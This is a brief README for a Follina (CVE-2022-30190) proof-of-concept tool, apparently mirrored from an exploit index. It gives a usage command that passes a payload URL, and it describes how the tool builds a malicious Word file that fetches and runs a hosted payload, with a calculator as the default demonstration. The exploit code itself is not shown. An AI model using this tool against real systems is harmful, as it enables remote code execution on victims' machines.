Share
## https://sploitus.com/exploit?id=F437A0D1-7913-51F2-9D43-8BC2DE62A636
# Follina-CVE-2022-30190 Proof of Concept by Nee

## Usage
```bash
python3 follina.py --payload-url "http://192.168.200.144:1337/pwn.html"
```
## What it does

- Creates a malicious word file which points to the payload url that you specify
- Hosts the default payload located in the web folder

Proof Of Concept Pops calc by default

> Feel free to make changes and push :)

![pwn.gif](https://raw.githubusercontent.com/ItsNee/Folina-CVE-2022-30190-POC/main/source_files/follina.gif)